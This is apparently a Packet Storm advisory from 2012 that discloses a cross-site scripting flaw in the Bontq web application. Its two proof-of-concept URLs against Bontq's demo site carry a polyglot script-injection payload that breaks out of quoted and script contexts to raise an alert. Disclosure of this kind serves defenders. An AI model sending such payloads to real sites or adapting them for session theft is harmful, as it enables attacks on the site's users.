Bontq suffers from a cross site scripting vulnerability.
928f7a337589fba598b4218d8ca5419945992040d545e2414e0278c9d941bc20# Exploit Title: Bontq Cross Site Scripting
# Date: 24.02.2012
# Author: Sony
# Software Link: http://www.bontq.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/bontq-cross-site-scripting.html
..................................................................
What is Bontq?
http://en.wikipedia.org/wiki/Bontq
It's was tested on the Bontq Demo.
http://demo.bontq.com/user/index (User)
http://demo.bontq.com/user/user/userinfo/id/2%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://2.bp.blogspot.com/-CNbsoIBb2-E/T0fRES5H9jI/AAAAAAAAAmM/vcIl64N5A-k/s1600/id2.JPG
http://demo.bontq.com/user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://4.bp.blogspot.com/-v5-MOSlU5BQ/T0fRKKVCgGI/AAAAAAAAAmY/RKyj42x-Lt4/s1600/reports2.JPG
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed